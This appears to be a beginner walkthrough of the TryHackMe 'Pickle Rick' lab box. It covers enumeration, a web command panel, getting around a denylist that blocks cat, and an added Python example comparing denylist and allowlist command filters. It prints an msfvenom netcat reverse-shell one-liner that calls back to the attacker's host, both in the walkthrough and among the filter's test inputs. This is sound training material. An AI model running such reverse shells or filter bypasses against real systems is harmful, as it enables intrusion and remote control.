Pickle Rick is a very fun themed box featured on the TryHackMe complete beginner learning path. It is placed after users have completed a range of Linux introductory tasks, networking basics and web hacking fundamentals. I think it is well placed, as the user should be able to make it through the box without any hints, and there is more than one way to complete it.
I will go through a few of the different methods I used and hopefully they will add to your list of tactics, the same way I have learnt from others.
To start with, I will just run a basic nmap scan to see what we have.
nmap -sC -sV ip_address
We don't have any credentials yet to look at SSH, so we will start with the web page "Rick is sup4r cool".
The landing page itself does not have any hyperlinks to any other pages. An inspection of the page itself reveals some information however.
For now we will record the username R1ckRul3s in our notes.
As the page does not link anywhere else, I run gobuster to see what else is available.
First I have a look at robots.txt to see if there is anything interesting.
The only thing in robots.txt is the string **************** which I will record in my notes.
Next I move onto the assets folder.
Relevant images for the site appear to be here but there doesn’t appear to be any other useful information.
nmap -sV --script=vuln ip_address
Running a further nmap scan for vulnerabilities reveals one important page.
Entering The Portal
Navigating to /login.php shows the following page.
Given the details that we recorded earlier, let's try the username R1ckRul3s and the password ****************.
Now we get access to ip_address/portal.php
Looking at the other menu pages (Potions, Creatures, Beth Clone Notes) shows the following page.
Moving back to the command panel page we can try some commands to see what access we have.
We can see we currently have access as user www-data. Next we will list what files are available.
The two interesting files we find here are Sup3rS3cretPickl3Ingred.txt and clue.txt. I then tried to use cat to read the contents of the files.
Oh dear, it appears some commands have been disabled to try and make it difficult for us to progress. Fortunately there are lots of other methods to try. Both files sit in the web root, so we can simply browse to them directly: ip_address/Sup3rS3cretPickl3Ingred.txt gives us our First Ingredient.
Before enumerating further with our command panel we can take a look at clue.txt with the same method which tells us to “Look around the file system for the other ingredient.”
The Second Ingredient
Using the command window we can explore the file system and will eventually reach /home/rick and locate a file called "second ingredients".
Now this file we can't browse to directly, so I'm going to go through a few different commands to get what we want.
Coming from a digital forensics background I quite like hexdump and xxd. They will output the file like this.
Some other commands that appear to work are “less” and “strings”.
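The section above shows why disabling individual command names does not protect a file: the panel refuses cat but still runs less, strings, hexdump and xxd. As an added example (not code from the box or from the original post), here is a hypothetical denylist filter of that shape next to an allowlist that parses the input into argv and rejects shell metacharacters; the denylist contents and the allowed commands are my assumptions.

```python
import shlex

# Constructed for this example: a denylist modelled on the box's behaviour,
# where cat is blocked but less, strings, hexdump and xxd still run.
# This is a hypothetical filter, not the box's real source code.
DENYLIST = {"cat", "head", "more", "tail"}

# Hardened alternative: a short allowlist of read-only commands that the
# panel legitimately needs, with no shell involved at all.
ALLOWLIST = {"ls", "pwd", "whoami", "id"}
SHELL_META = set(";|&<>`$(){}\n\r")


def denylist_check(cmdline: str) -> tuple:
    """The weak filter: reject only when the first word is a forbidden program."""
    words = cmdline.split()
    if not words:
        return False, "empty command"
    if words[0] in DENYLIST:
        return False, f"blocked program: {words[0]}"
    return True, "allowed"


def allowlist_check(cmdline: str) -> tuple:
    """Allow only a known program, parsed into argv, with no shell metacharacters."""
    if any(ch in SHELL_META for ch in cmdline):
        return False, "shell metacharacter present"
    try:
        argv = shlex.split(cmdline)  # parse into an argv list, never hand a string to a shell
    except ValueError as exc:
        return False, f"unparseable: {exc}"
    if not argv:
        return False, "empty command"
    if argv[0] not in ALLOWLIST:
        return False, f"program not allowlisted: {argv[0]}"
    return True, "allowed"


def compare(cmdline: str) -> dict:
    """Run both policies over one input so the difference is visible side by side."""
    return {"denylist": denylist_check(cmdline)[0], "allowlist": allowlist_check(cmdline)[0]}


if __name__ == "__main__":
    # Inputs taken from the walkthrough: the disabled cat, the alternatives that
    # still ran, and chained commands of the kind a netcat one-liner relies on.
    for cmd in ("whoami", "ls", "cat clue.txt", "less clue.txt", "strings clue.txt",
                "ls; cat clue.txt", "mkfifo /tmp/f; nc local_ip 4444 0</tmp/f | /bin/sh >/tmp/f"):
        print(f"{cmd!r:70} {compare(cmd)}")
```

The denylist passes everything except a command that literally starts with a forbidden word, while the allowlist rejects any chained, piped or redirected input before it reaches a shell.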
The Final Ingredient And Shell
Now that we have the Second Ingredient, it's time to go searching for the third one. I had a good look through the file system and nothing was standing out, so I thought I would check what permissions the user has.
To make my life easier I thought I would try to get a simple reverse shell, and generated one from msfvenom.
msfvenom -p cmd/unix/reverse_netcat lhost=[local_ip] lport=4444 R
That generates this handy command string that I can run in the command panel. I set netcat to listen on port 4444 and run the following:
mkfifo /tmp/gceiday; nc local_ip 4444 0</tmp/gceiday | /bin/sh >/tmp/gceiday 2>&1; rm /tmp/gceiday
This shell would have made the previous section a bit easier. From this I switch to the root user and have a look in the root directory. There we find a file named 3rd.txt. In this shell I can use cat and boom. There we have the Third ingredient, finishing what was a nice fun box to complete.
I’m sure there are many many other options to complete this box and I look forward to reading other walkthroughs to see what paths they took.
The only other thing I found was an HTML comment on the portal.php page that looks to be base64 encoded.
Sure enough, it is base64 encoded 7 times over and reads "rabbit hole", which for me seems appropriate as I feel like I am going down the rabbit hole every time I start on a new box.
Thank you for reading and credit to tryhackme for creating this box.